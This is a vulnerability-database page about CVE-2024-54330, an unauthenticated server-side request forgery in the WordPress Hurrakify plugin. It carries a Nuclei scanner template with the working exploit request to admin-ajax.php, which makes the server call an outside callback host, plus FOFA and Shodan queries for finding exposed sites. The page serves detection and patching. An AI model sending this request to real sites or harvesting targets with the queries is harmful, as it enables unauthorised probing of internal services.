| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| WordPress Hurrakify 2.4 Server-Side Request Forgery Vulnerability | 2 Jan 202500:00 | – | zdt | |
| CVE-2024-54330 | 13 Dec 202417:26 | – | circl | |
| WordPress plugin Hurrakify 代码问题漏洞 | 13 Dec 202400:00 | – | cnnvd | |
| CVE-2024-54330 | 13 Dec 202414:25 | – | cve | |
| CVE-2024-54330 WordPress Hurrakify plugin <= 2.4 - Server Side Request Forgery (SSRF) vulnerability | 13 Dec 202414:25 | – | cvelist | |
| CVE-2024-54330 | 13 Dec 202415:15 | – | nvd | |
| WordPress Hurrakify plugin <= 2.4 - Server Side Request Forgery (SSRF) vulnerability | 11 Dec 202420:56 | – | patchstack | |
| PT-2024-36214 · Hurrakify · Hurrakify | 13 Dec 202400:00 | – | ptsecurity | |
| CVE-2024-54330 | 5 Feb 202504:14 | – | redhatcve | |
| CVE-2024-54330 WordPress Hurrakify plugin <= 2.4 - Server Side Request Forgery (SSRF) vulnerability | 13 Dec 202414:25 | – | vulnrichment |
id: CVE-2024-54330
info:
name: Hurrakify <= 2.4 - Server-Side Request Forgery
author: s4e-io
severity: high
description: |
The Hurrakify plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.4. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.
impact: |
Unauthenticated attackers can make arbitrary HTTP requests from the server to internal or external services, potentially accessing internal resources or performing port scanning.
remediation: |
Update Hurrakify plugin to version 2.5 or later to address the SSRF vulnerability.
reference:
- https://github.com/RandomRobbieBF/CVE-2024-54330
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hurrakify/hurrakify-24-unauthenticated-server-side-request-forgery
- https://nvd.nist.gov/vuln/detail/CVE-2024-54330
- https://patchstack.com/database/wordpress/plugin/hurrakify/vulnerability/wordpress-hurrakify-plugin-2-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2024-54330
cwe-id: CWE-918
epss-score: 0.01432
epss-percentile: 0.69847
metadata:
verified: true
max-request: 2
vendor: by_hep_hep_hurra
product: hurrakify
framework: wordpress
fofa-query: body="wp-content/plugins/hurrakify"
shodan-query: http.html:"wp-content/plugins/hurrakify"
tags: cve,cve2024,wordpress,wp-plugin,hurrakify,ssrf,oob,oast,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/hurrakify")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- 'http'
- type: word
part: content_type
words:
- 'text/html'
- type: status
status:
- 200
# digest: 490a0046304402206d6f0e7e408604c803da60da8d6329215eecd6a7200e37cdcfaeefef1688b4e702200ce0bda09a9febc9a951565ffb735556a41f0f6daafb705006a7e6946cbdc4af:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation